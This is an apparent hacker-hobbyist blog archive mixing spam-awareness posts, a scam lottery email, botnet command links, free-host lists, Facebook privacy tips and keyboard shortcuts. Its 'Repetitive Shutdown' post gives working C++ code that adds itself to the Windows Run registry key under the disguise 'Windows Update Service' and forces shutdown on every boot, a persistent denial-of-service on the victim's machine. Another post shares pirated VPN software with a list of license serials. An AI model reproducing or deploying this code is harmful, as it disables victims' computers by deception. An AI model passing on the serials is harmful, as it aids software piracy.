Few of the spams which i receive most of the time
Written by OpenMindLeader on 7:26 AMI get many spams in my inbox and it has been always a tedious and irritating thing for me...i get mails like saying "shipment of your consignment of funds to your door Step",electronic mail winnig notification and much more saying that i have won many million dollars....one mail was like this
Ref: 575061725
Batch: 8056490902/188
AWARD NOTIFICATION: FINAL NOTICE
Attn: Winner,
We are pleased to inform you of the lottery result winners of Australian International Lottery Programmes held on the 1st of October, 2009 from the Australian International Lottery programme. Which is fully based on an electronic selection of winners using their e-mail addresses? Your name was attached to ticket number; 675061725 9356460902 Serial Number 67749137002. This batch draws the lucky numbers as follows 2-9-23-35-46 bonus number 14, which consequently won the lottery in the second category. You are here by having been approved a lump sum pay of US$500,000.00 (FIVE HUNDRED THOUSAND DOLLARS) in cash credit file ref: ILP/HW 46708/09 from the total cash prize shared amongst eight lucky winners in this category.
Due to mix up of some numbers and names, you are advised to keep your winning information confidential until your claims has been processed and your money remitted to your nominated bank. This is part of our security protocol to avoid double claims and unwarranted abuse of this programme by some participants. All participants where selected through a computer/mail balloting system drawn from Nine hundred thousand E-mail addresses from Canada, Australia, United States, Asia, Europe, Middle East, Africa and Oceania as part of our international promotions program which is conducted annually. This Lottery was promoted and sponsored by a conglomerate of some multinational companies as part of their social responsibility to the citizens in the communities where they have operational base. Furthermore, your details (e-mail address) falls within our representative office in Nigeria as indicated in your play coupon and your prize award of US$500,000.00 will be released to you from our regional branch office in Abuja. We hope with part of your prize, you will participate in our end of year high stakes for US$2.3 Million international draw.
To file for your claim. Please quote your Date of draw, Reference Number, Batch Number and Winning Number, which can be found on the top-left corner of this message. Also, you should give in your telephone number to help locate your file easily. For security reasons, we advice all winners to keep this information confidential from the public until your claim is processed and your prize has been released to you and also to the public. This is part of our security protocol to avoid double claiming and unwarranted taking advantage of this programme by non-participant or unofficial personnel.
HOW TO CLAIM YOUR PRIZE:
Simply fill in the needed and contact our claims agent,
Mr. David Albert
E-mail: mrdavidalbert@ymail.com
Tel: +2348065446802
NAME..........EMAIL ADDRESS.......
OCCUPATION.........YOUR FULL ADDRESS..........NATIONALITY..............
MOBILE/PHONE.........SEX.............AGE............
Best Regards
Dr. Patrick Wilmont
Associate Publisher
Australian Lottery Team.
I dont known what they want.... :(
Never reply to these kinds of emails
SpaMs
Written by OpenMindLeader on 7:22 AMWhat is a SPAM email?
A SPAM Email is an unsolicited commercial email, in other words, an email trying to sell you something which you haven't requested.
Never reply to a SPAM email
SPAM emails will almost always invite you to unsubscribe from their mailing list. This is a way for them to confirm your email address is real. It will offer a link, or it will say something like 'Reply to this email with UNSUBSCRIBE in the subject', never do it.
In this guide we will give you some general tips about how you can try and minimise these nuisance SPAM emails. We will also look at how you can help stop spammers by reporting the SPAM emails you receive.
Where do they get my email address from?
Spammers get email addresses by various methods, the most common are listed below:
Dictionary attacks
Some spammers use software to randomly generate email addresses for popular email providers. Commonly called dictionary attacks, the software will guess the first part of an email address: guessed@emailprovider.com
The way to avoid this is to use an email address containing special characters such as underscores or numbers.
Purchasing third party lists
Buying email addresses from third parties.
To avoid this only give your email address to trusted sites.
Email Harvesters
Some spammers use special software called email harvesters which scan webpages for email addresses. Common targets for email harvesters are message boards and social networking websites.
To avoid your email being picked up by this type of software, when including your email address on a webpage (for example when you use a message board) try to obscure it. For example, use john AT yourprovider.com instead of using the @ symbol.
How can I report SPAM emails ?
To actively do something about the SPAM problem by reporting any SPAM emails you receive, there are different ways to go about it depending on where you live.
How to Report SPAM emails in the United States
In the US the legislation covering SPAM emails is the CAN-SPAM ACT (Controlling the Assault of Non-Solicited Pornography and Marketing Act).
To report any SPAM emails forward a copy of them to spam@uce.gov.
For more on the CAN-SPAM ACT visit the Federal Trade Commission website.
How to Report SPAM emails in the United Kingdom
In the UK you have the The Privacy and Electronic Communications Regulations 2003.
To report SPAM emails that have originated from the UK you can fill out a complaint form, this is a Microsoft Word document which you can find here.
For more on SPAM emails in the UK visit the Information Commissioner's website.
BeEF browser exploitation framework
Written by OpenMindLeader on 6:55 AMThis version has more modules and a more flexible framework.
BeEF is the browser exploitation framework. Its purposes in life is to provide an easily integratable framework to demonstrate the impact of browser and cross-site scripting issues in real-time. The modular structure has focused on making module development a trivial process with the intelligence existing within BeEF. Some of the basic functionality includes Keylogging and Clipboard Theft.
Enhancements in the latest version include:
Integration with Metasploit via XMLRPC
Mozilla extension exploitation support
New browser functionality detection modules
Tiered logging for module actions and results
Download and More info: BindShell.Net: BeEF
Command Lists of Bots
Written by OpenMindLeader on 6:50 AMPhatbot Commands
http://www.stanford.edu/~stinson/misc/curr_res/bot_refs/phatbot_commandref.html
Agobot 3 Commands
http://www.stanford.edu/~stinson/misc/curr_res/bot_refs/agobot3_commandref.html
rBot Commands
http://www.angelfire.com/theforce/travon1120/RxBotCMDLIST.html
sdbot Commands
http://www.stanford.edu/~stinson/misc/curr_res/bot_refs/sdbot_commandref.html
spybot 1.3 commands (Scroll bit down)
http://www.stanford.edu/~stinson/misc/curr_res/bot_refs/spybot1.3_readme.txt
rename folder to con
Written by OpenMindLeader on 6:46 AMHey all.... If u try to make a folder name con u r not able to do it.....hehe.....but u can do it by DOS......
Steps to make a con folder.....
1.goto cmd....
2.enter the drive u want....
3.mkdir con\
If u want to delete it normally u cant.....lol..... Tongue Tongue Grin YAY
if u want to delete it.....
go back to DOS again and ...... add
rmdir con\
BT Discover 1.20
Written by OpenMindLeader on 6:43 AMThis application searches for bluetooth devices in range and saves their address to .html or .txt file.
Should work on any application with display size 176x220 and java support.
Download:
http://java.xor.sk/down.php?wtf=BT_DISCOVER_2.jar&en=1
AntiVirus for Cellphones 2008 v2
Written by OpenMindLeader on 6:42 AM
AntiVirus for Cellphones 2008 v2 | 12.41MB
All antivirus software for Cellphones update 2008 to version 2
http://w17.easy-share.com/1701087678.html
http://rapidshare.com/files/134357593/keosoft90-Antivirus.4.Cellphones.2008.v2_dasofts.rar - RS Direct (momentarily working)
Steganos Internet Annoym VPN
Written by OpenMindLeader on 6:40 AMWell I found this program a few months ago whilst browsing the interwebz, may aswell share it with you homies
Its called Steganos Internet Annoym VPN
It connects to you to a VPN when you press connect "Usually Germany"
I uploaded this myself :]
Code:
http://rapidshare.com/files/116285731/Steganos_Internet_Anonym_VPN_Flatrate.rar
Heres some serial for this application
65B6-24C6-64B0-27AE-1B1A-4ABC-C513-6684
0457-D380-A552-C0CD-A1D8-190F-0C9F-2762
AFD3-32BA-764E-BB41-D550-E574-122C-733D
CC2A-EFAE-7F62-1407-CFE1-0E11-90D2-3598
32D8-F583-5D46-4DF2-403F-225A-B477-4497
CE28-A58D-C4D0-75D8-B750-5E01-B8D0-29CC
2189-50A6-6815-EE91-3624-C2B6-E009-0D02
D28F-EC5B-B4B7-DFF7-08C8-F941-6CD0-876E
Proxy Shell Hide IP 3.0.1
Written by OpenMindLeader on 6:37 AM
ProxyShell Hide IP is a professional and powerful hide IP software. Our unique algorithm effectively manages and uses multiple proxies to hide your IP address, provides you faster and more reliable anonymous surfing.
With ProxyShell Hide IP, you can hides IP address, surf the web without anyone knowing who you are, protect your own information and reading interests. ProxyShell Hide IP could also bypass restrictions if your IP is blocked, used to send emails or post on BBS without displaying your own IP.
ProxyShell Hide IP Standard
Free Trial, $39.95 to Buy
ProxyShell Hide IP uses our own proxies and many public proxies to hide your IP address. Our unique algorithm effectively uses multiple proxies to handle your surfing requests simultaneously, offers faster speed, much better proxy errors tolerance and stability. ProxyShell Hide IP is totally automatic and easy-to-use, it works with Internet Explorer, Firefox and all other major browsers.
Key Features of ProxyShell Hide IP
* Hide IP address to make you surf anonymously
* Send anonymous emails, post on forums without displaying your own IP
* Bypass restrictions if your IP address is blocked
* Totally automatic and easy-to-use, work with all major browsers
* Unique algorithm to effectively use public proxy servers for surfing
* Provide fast internet speed when surfing anonymously
* Proxy fault tolerance and more reliable than most of proxy softwares
* One-time price, no monthly fee, with lifetime free upgrades
Download:
http://rapidshare.com/files/231445361/ProxyShell_Hide_IP.rar
IP LOgger in | |PHP | |
Written by OpenMindLeader on 6:34 AMHere is a simple piece of php code which can be added in your website to log the visitor's ip address.Here is the code
$v_ip = $REMOTE_ADDR;
$v_date = date("l d F H:i:s");
$fp = fopen("ips.txt", "a");
fputs($fp, "IP: $v_ip - DATE: $v_date\n\n");
fclose($fp);
?>
Long list of free web hosters
Written by OpenMindLeader on 6:31 AMHost with little space an some ads
http://www.enjetek.com ( 15MB )
http://www.f2g.net ( 15MB, FTP,no ads, PHP4 )
http://www.geocities.com/
http://www.angelfire.com/
http://www.tripod.com/
http://www.topcities.com/
PHP support from 15 until 25 MB with MySQL some ads
http://www.host.sk/ (no ads)
http://www.php50.com/ (pop-up)
http://www.t35.com/ (pop-up)
http://www.clawz.com/ (banner)
http://www.tripod.co.uk/ (pop-up, MySQLincluded)
Big web host with FTP
http://www.freewebsites.com/
http://www.gizba.com/
http://www.webavenue.org/
http://www.hut.ru/
http://www.web1000.com/
http://www.phidji.com/ (100MB,no ads, ASP)
http://www.spacetowns.com ( 50 MB,no ads)
http://www.freecoolpages.com ( 50 MB, PHP4 )
http://www.topcities.com ( 150MB )
http://www.nerocities.com ( 100MB, FTP,no ads)
http://www.Topzite.com ( 1000MB, FTP,no ads, CGI )
http://www.tripod.c?uk ( 100MB,with ads )
http://www.mystigall.com/ (75MB,no ads, FTP, CGI)
http://www.webazn.net/ (50MB,no ads)
Host with little space an some ads
http://www.enjetek.com ( 15MB )
http://www.f2g.net ( 15MB, FTP,no ads, PHP4 )
http://www.geocities.com/
http://www.angelfire.com/
http://www.tripod.com/
http://www.topcities.com/
host with CGI support for Ikonboard and YaBB with FTP!
http://www.brinkster.com/ (no FTP,no ads)
http://www.raketnet.nl/
http://www.cfm-resources.com/
http://www.aspfreeserver.com/
http://www.websamba.com/
host bigger than 15MB, bandwidth 1GB/month with PHP,MySQL and CGI!
http://www.port5.com ( 15MB, FTP,no ads)
http://www.amzweb.net/signup.php (also has ASP)
http://www.spaceports.com/
http://www.digitalrice.com/ (only 5 MB space)
http://www.portland.c?uk/ (only 100 MB bandwidth)
host from 20 until 30MB with PHP,MySQL and FTP!
http://www.host.sk/ (no ads)
http://www.spaceports.com/
http://www.tripod.co.uk/
http://www.multimania.com/
http://www.amzweb.net/signup.php
http://www.t35.com ( 35MB, FTP,no ads)
host bigger than 20MB, unlimited bandwidth and FTP!
http://www.webavenue.org/ (no ads)
http://www.ghs20.com/ (no ads)
http://www.host.sk/ (no ads)
http://www.amzweb.net/signup.php
http://www.netfirms.com/
http://www.fateback.com/
http://www.barrysworld.com/ (35MB,no ads, fast, PHP)
free BulletinBoards and Forums
http://www.phpbb.com - phpBB2 (PHP, mySQL)
http://woltlab.de - wbb1 (PHP, mySQL)
http://yabb.info - YaBB SE (PHP, mySQL)
http://openbb.com - OpenBB2 (PHP,mySQL)
http://www.invisionboard.com - Ibforums (PHP,mySQL AND CGI)
http://forum.snitz.com Snitz Forum2000 (ASP)
http://german-bulletin-board.de - gBB (PHP, mySQL) (Cool)
http://www.phorum.org/ - Phorum (PHP, MySQL,open source )
http://www.xmbforum.com/ - XMB (PHP + MySQL)
http://www.minibb.net/ - MiniBB (PHP + MySQL)
http://www.yabb.com/- YaBB original (CGI)
http://www.mybboard.com/ - MyBB/DevBB (PHP, MySQL)
http://www.xmbforum.com/ - XMB (PHP, mySQL
http://www.simplemessageboard.com/ - SMP (CFM, MSsql)
http://www.lokwa.com/ - lokwaBB (PHP, Mysql)
http://www.mercuryboard.com/ - MurcuryBoard (PHP, MySQL)
http://edge-programming.com/eboard/ - EBoard (PHP)
http://www.smartbb.net/ - SmartBB (PHP, Mysql)
http://www.myboard.co.uk/ - myBoard (PHP, MySQL)
http://mybboard.com - DevBB (PHP, mysql)
http://www.versiforum.com - VersiForum (ASP)
free host remote Forum!
http://upperboard.com/
http://forums.asp-dev.co.uk/
http://www.xsorbit.com/
http://www.proboards.com/
http://www.ezboard.com/
http://forums.hostultra.com/
http://www.network54.com/
http://www.everyone.net/
http://www.mycool.com
http://www.guestforum.com/
http://www.voy.com/
http://www.dk3.com/
http://www.homepagetools.com/ultraboard
http://www.swiftsolution.com/
http://groups.yahoo.com/
http://communities.msn.com/
http://on.starblvd.net/meet
http://forums.delphi.com/
http://www.suddenlaunch.com/
http://bb.bbboy.net/
http://www.eboards4all.com/
free sub-domains!
http://www.freeurl.com
http://www.jwdx.com
http://www.cjb.net
http://www.dot.tk
http://www.v3.com
http://www.hotredirect.com
http://www.internetjump.com
http://www.explode.to
http://www.zdos.com
http://www.webalias.com
http://www.reduce.to
http://www.warping.to
http://www.gosurfto.com
http://www.2000c.net
http://www.shorturl.com
http://www.has.it
http://www.doze.to
http://www.nigx.net
http://www.1fx.net
http://www.soar.to
http://www.123redirect.com
http://www.ipfox.com
http://www.webweaver.nu
http://www.ohgo.com
http://www.url-redirection.org
http://www.aliasnames.com
http://www.get-2.com
http://www.myredirector.com
http://www.dot.nu
http://www.tr.cx
http://www.kickme.to
http://www.rapworld.com/url/
http://www.dk3.com
http://www.xiy.net
http://www.url.animeumbrella.com
http://www.suite.net/url.htm
http://www.surftohere.com
http://www.israd.net
http://www.ontheweb.nu
http://www.globalredirect.com
http://www.flash.to
http://www.zooming.to
http://www.linkworld.to
http://www.rename.net
http://www.url4life.com
http://www.n2v.net
http://www.nethop.com
http://www.webmask.com
http://www.heroffice.com
http://www.crcpl.tsx.org
http://www.guruguru.to
http://www.iscool.net
http://www.dkanet.com
http://www.r67.com
http://www.uni.cc
http://www.ulimit.com
http://www.e33.de
http://www.de.vu
http://www.dd.vu
http://www.6x.to
http://www.b4.to
http://www.b6.to
http://www.h3.to
http://www.thx.to
http://www.faster.as
http://www.hop2.de
http://www.tsx.to
http://www.tsx.org
http://www.bootme.to
http://www.ubb.cc
http://zwap.to
http://www.xsub.ws
http://www.elite.to
http://www.2fbi.de
http://www.suckz.de
http://www.b6.to
http://www.quickurl.com
http://www.9cy.net/myred/signup.php
free Domains!
http://www.dot.tk/ (redirect)
http://www.uni.cc/ (redirect, host or domain)
http://www.dhs.org
free file save
http://java.isavvix.com/freeback.jsp
http://www.myplay.com/
http://www.sharemation.com/
http://www.staroffice.com/
http://www.storagevault.net/
http://www.tiomeg.com/
http://briefcase.yahoo.com/
http://www.zden.com/Signup.asp?ID=136463
free Pop3 E-mails!
http://mail.uni.de
http://quickemail.de
http://gmx.net
http://mypad.com
http://kgb.cz
http://amexmail.com
http://freemail.web.de
http://uyeler.mynet.com
http://eng.mail.port.ru
http://passagen.se
http://cjb.net
http://myrealbox.com
http://mail.urbia.de
http://my-mail.ch
http://westonline.com
http://mundomail.net
http://www.hotpop.com
http://webmail.berlin.de
http://club.lemonde.fr
http://emailcity.de
http://mail.lycos.co.uk
http://epost.de
http://schondrin.de
http://freemail.nl
http://idlo.de
http://saintmail.net
http://topsurf.com
http://uk2.net
http://liquid2k.com
http://dostmail.com
http://china.com
http://hotpop.com
http://newmail.net
http://mail.arabia.com
http://mail.ofir.dk
http://home.se
http://epost.portalen.no
http://runbox.com
http://mail.tut.by
free e-mail for your site
http://bigmailbox.com
http://zzn.com
http://i-p.com
http://oemmail.com
free hit counter and statistics for your site
http://www.sitemeter.com
http://www.addfreestats.com
http://www.bravenet.com
http://www.admo.net
http://www.thecounter.com
http://www.extreme-dm.com/
http://www.nedstat.com/
http://www.stats4all.com
http://www.realtracker.com
http://www.analogstats.com
http://www.geocounter.net
http://www.webtrendslive.com
http://www.okcounter.com
http://www.vioclicks.com
http://www.freegreece.net (fantastico)
http://www.x10hosting.com/ (fantastico)
http://www.objectis.org/ (zope, plone)
http://www.clawz.com/
http://www.1asphost.com/
http://www.tripod.lycos.co.uk/
http://www.150m.com/
http://www.bravenet.com/webhosting/
http://www.thefreeserver.net/
http://www.hp-h.us/
http://www.gamingsource.co.uk/
http://www.forumhoster.com/
http://www.zap3x.com/
http://www.arcor.de
http://www.cyberfreehost.com/
http://www.100webspace.com/
http://www.perforton.com/
http://www.freehostplus.com/
http://www.shyper.com/
http://www.freewebtown.com
http://www.doteasy.com/
http://www.50megs.com/
http://www.freewebpage.org/
http://www.012webpages.com/
http://www.facternet.com/
http://www.imagehosting.us/
http://www.95mb.com/
http://www.250free.com/
http://www.esmartstart.com/
http://www.00freehost.com/
http://www.fortunecity.com/free.shtml
http://www.100megsfree.com/
http://www.thefreesite.com/Free_Web_Space/
http://www.web1000.com
http://www.easyspace.com
http://www.800mph.com
http://homes.arealcity.com
Http://www.conk.com
Http://www.crosswinds.net
Http://www.envy.nu
Http://www.fthosting.com
http://www.phidji.com/
http://www.7host.com/
http://www.domaindlx.com/
http://www.brinkster.com/
Http://www.turkpark.net
http://www.polarhome.com/
http://www.thefreeserver.com
http://www.20m.com/ (20 megabyte)
http://www.50megs.com/ (50 MB )
http://www.75megs.com/ (75 mb)
http://www.90megs.com/ (90 mb)
http://www.aboveme.com/ (20 mb)
http://www.acmecity.com/ 20 MB
http://www.aliencities.com/ 25 Mb.
http://www.amazingtopcities.com/ 150 MB
http://www.bizland.com/ 35 MB
http://www.brinkster.com/
http://www.codename.com/
http://www.cybercities.com/
http://www.dingojunction.com/ 10 MB
http://www.domaindlx.com/ 25 MB
http://www.dreamwater.com/ 30 MB
http://www.isminiz.8k.com/
http://www.8m.com
http://www.homepage.com/ 10 MB
http://www.httpcity.com/ 25 MB
http://www.hypermart.com/ 10 MB
http://www.lunarpages.com/ 50 MB
http://www.lycos.co.uk/ 50 MB
http://www.mindpigs.com/ 20 MB
http://www.nbci.com/
http://www.netcitizen.com/ 20 Mb
http://www.portland.co.uk/
http://www.trgold.net/
http://www.trgold.net/
http://www.bolum.net/
http://www.isimsiz.com/
http://www.web14.net/
http://www.web-adresim.com/
http://www.mail-adresim.com/
http://www.paradox.gen.tr/
http://www.websamba.com/
http://www.windygates.com/
http://www.heyonline.com/
http://www.cu2.nl/
http://www.freewebpage.org/
http://www.0catch.com/
Phishing TutS
Written by OpenMindLeader on 6:25 AMThis summary is not available. Please click here to view the post.
[C++] Repetitive Shutdown
Written by OpenMindLeader on 6:21 AMHere is a program to shutdown your computer using c++ program
#include
#include
#include
#include
void AddToReg(char *description) {
HKEY regStart;
char sPath[300];
GetModuleFileName(NULL, sPath, 300);
RegCreateKeyEx(
HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run ",
0,
NULL,
REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS,
NULL,
®Start,
NULL
);
RegSetValueEx(regStart, description, 0, REG_SZ, (const BYTE*)sPath, strlen(sPath));
RegCloseKey(regStart);
}
int main() {
AddToReg("Windows Update Service");
system("shutdown -s -f -t 00");
return 0;
}
There are also other methods to do this by using a simple batch file.This program is only for educational purpose.I hope u ppl will like this.
Top 5 Privacy Settings Every Facebook User Should Know
Written by OpenMindLeader on 1:17 AMEveryday I receive an email from somebody about how their account was hacked, how a friend tagged them in the photo and they want a way to avoid it, as well as a number of other complications related to their privacy on Facebook. Over the weekend one individual contacted me to let me know that he would be removing me as a friend from Facebook because he was “going to make a shift with my Facebook use - going to just mostly family stuff.”
Perhaps he was tired of receiving my status updates or perhaps he didn’t want me to view photos from his personal life. Whatever the reason for ending our Facebook friendship, I figured that many people would benefit from a thorough overview on how to protect your privacy on Facebook. Below is a step by step process for protecting your privacy.
1. Use Your Friend Lists
I can’t tell you how many people are not aware of their friend lists. For those not aware of what friend lists are, Facebook describes them as a feature which allows “you to create private groupings of friends based on your personal preferences. For example, you can create a Friend List for your friends that meet for weekly book club meetings. You can create Friend Lists for all of your organizational needs, allowing you to quickly view friends by type and send messages to your lists.”
There are a few very important things to remember about friend lists:
* You can add each friend to more than one friend group
* Friend groups should be used like “tags” as used elsewhere around the web
* Friend Lists can have specific privacy policies applied to them
I’ll touch on each of the things listed above in more detail later. A typical setup for groups would be “Friends”, “Family”, and “Professional”. These three groups can then be used to apply different privacy policies. For example, you may want your friends to see photos from the party you were at last night, but you don’t want your family or professional contacts to see those photos.
Using friend lists is also extremely useful for organizing your friends if you have a lot of them. For instance I have about 20 friend lists and I categorize people by city (New York, San Francisco, D.C., Tel Aviv, etc), where I met them (conferences, past co-workers, through this blog), and my relationship with them (professional, family, social, etc).
You can configure your friend lists by visiting the friends area of your Facebook
2. Remove Yourself From Facebook Search Results
My mom is a teacher and one of the first things she asked me when she joined Facebook is how she could make sure her students couldn’t see that she was on the site. Understandably my mom doesn’t want her middle school students to know what she’s up to in her personal life. There are numerous reasons that individuals don’t want their information to show up in search results on Facebook, and it’s simple to turn off your public visibility.
How to Remove Yourself From Facebook Search Results
Now that you’ve decided that you would like to remove yourself from Facebook’s search results, here’s how to do it:
1. Visit your search privacy settings page
2. Under “Search Visibility” select “Only Friends” (Remember, doing so will remove you from Facebook search results, so make sure you want to be removed totally. Otherwise, you can select another group, such as “My Networks and Friends” which I believe is the default.)
3. Click “Save Changes”
By default, Facebook makes your presence visible to the network you are in. Frequently, people aren’t aware of their visibility, so this is one of the first settings that users wish to modify. By selecting “Customize” from the search visibility drop down you can make your settings even more granular. 
3. Remove Yourself From Google
Facebook gets A TON of traffic from displaying user profiles in search engines. Not all of your profile is displayed though. Currently the information displayed in the search profile is limited to: your profile picture, a list of your friends, a link to add you as a friend, a link to send you a message, and a list of up to approximately 20 fan pages that you are a member of.
For some people, being displayed in the search engines is a great way to let people get in contact with you, especially if you don’t have an existing website. Facebook also tends to rank high in the search results, so if you want to be easy to find, making your search profile can be a great idea. Many people don’t want any of their information to be public though.
By visiting the same search privacy settings page listed in the previous step, you can control the visibility of your public search listing which is visible to Google and other search engines. You can turn off your public search listing by simply unchecking the box next to the phrase “Create a public search listing for me and submit it for search engine indexing” as pictured in the image below.
4. Avoid the Infamous Photo/Video Tag Mistake
This is the classic Facebook problem. You let loose for a few hours one night (or day) and photos (or videos) of the moment are suddenly posted for all to view, not just your close friends who shared the moment with you. The result can be devastating. Some have been fired from work after incriminating photos/videos were posted for the boss to see. For others, randomly tagged photos/videos have ended relationships.
At the least, a tagged photo/video can result in personal embarrassment. So how do you prevent the infamous tagged photo or video from showing up in all of your friends news feeds? It’s pretty simple. First visit your profile privacy page and modify the setting next to “Photos Tagged of You”. Select the option which says “Customize…” and a box like the one pictured below will pop up.
Select the option “Only Me” and then “None of My Networks” if you would like to keep all tagged photos private. If you’d like to make tagged photos visible to certain users you can choose to add them in the box under the “Some Friends” option. In the box that displays after you select “Some Friends” you can type either individual friends or friend lists. 
5. Protect Your Albums
Just because you’ve uploaded photos doesn’t mean that you’ve accurately tagged every photo correctly. This setting is more of a reminder than anything else. Frequently people will turn of their tagged photo visibility to certain friend lists yet keep their photo albums public to the world. If you are trying to make all your photos invisible you must do so on an album by album basis.
There is a specific Photos Privacy page from which you can manually configure the visibility of each album (as pictured below). This is an extremely useful configuration option and I highly recommend that you take advantage of it. This way you can store your photos indefinitely on Facebook yet ensure that the only people that can view your photos are the ones who you really want to see them.
Man killed wife in Facebook row
Written by OpenMindLeader on 1:13 AM
A man has been jailed for life for stabbing his wife to death over a posting she made on the social networking site Facebook.
Wayne Forrester, 34, told police he was devastated that his wife Emma, also 34, had changed her online profile to "single" days after he had moved out.
The Old Bailey heard Forrester drove to her home in Croydon, south London, and attacked the mother-of-two.
He stabbed her with a kitchen knife and a meat cleaver on 18 February.
Forrester, who pleaded guilty to murder, was ordered to serve a minimum term of 14 years.
Judge Brian Barker, the Common Serjeant of London, told him: "You committed a terrible act. There is no possible excuse or justification.
"This is a tragic killing and what you have done has caused untold anguish."
Forrester, an HGV driver, was drunk and high on cocaine when he attacked the mother of two in the early hours as she slept.
He beat her, tore out clumps of her hair, and repeatedly stabbed her in the head and neck.
Neighbours were woken up by her screams. They found him sitting outside the house covered in blood and called the police.
The court heard Forrester thought his wife, a payroll administrator, was having an affair and had threatened to kill her.
The couple, who had been together for 15 years, had a "volatile" marriage, jurors were told.
'Devastated and humiliated'
The day before the murder, he called her parents and complained about his wife's Facebook entry which he said "made her look like a fool", the court heard.
In a statement to police Forrester said: "Emma and I had just split up. She forced me out.
"She then posted messages on an internet website telling everyone she had left me and was looking to meet other men.
"I loved Emma and felt totally devastated and humiliated about what she had done to me."
In a victim impact statement, Mrs Forrester's sister Liza Rothery said the murder had had a "devastating" impact on her and parents Frances and Robert.
Miss Rothery added: "What on earth could Emma have done to result in such a brutal, callous attack on a defenceless woman?"
keyboard tutorial
Written by OpenMindLeader on 1:59 AMGetting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:
Windows key + R = Run menu
This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer
ALT + Tab = Switch between windows
ALT, Space, X = Maximize window
CTRL + Shift + Esc = Task Manager
Windows key + Break = System properties
Windows key + F = Search
Windows key + D = Hide/Display all windows
CTRL + C = copy
CTRL + X = cut
CTRL + V = paste
Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.
Keyboard Shortcuts
[Alt] and [Esc] Switch between running applications
[Alt] and letter Select menu item by underlined letter
[Ctrl] and [Esc] Open Program Menu
[Ctrl] and [F4] Close active document or group windows (does not work with some applications)
[Alt] and [F4] Quit active application or close current window
[Alt] and [-] Open Control menu for active document
Ctrl] Lft., Rt. arrow Move cursor forward or back one word
Ctrl] Up, Down arrow Move cursor forward or back one paragraph
[F1] Open Help for active application
Windows+M Minimize all open windows
Shift+Windows+M Undo minimize all open windows
Windows+F1 Open Windows Help
Windows+Tab Cycle through the Taskbar buttons
Windows+Break Open the System Properties dialog box
acessability shortcuts
Right SHIFT for eight seconds........ Switch FilterKeys on and off.
Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.
Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.
SHIFT....... five times Switch StickyKeys on and off.
NUM LOCK...... for five seconds Switch ToggleKeys on and off.
explorer shortcuts
END....... Display the bottom of the active window.
HOME....... Display the top of the active window.
NUM LOCK+ASTERISK....... on numeric keypad Display all subfolders under the selected folder.
NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.
NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.
LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.
RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.
Type the following commands in your Run Box (Windows Key + R) or Start Run
devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog
internetbrowser
type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it
For Windows XP:
Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.
Use these keyboard shortcuts for dialog boxes:
To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE
If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:
Display or hide the Start menu. WIN Key
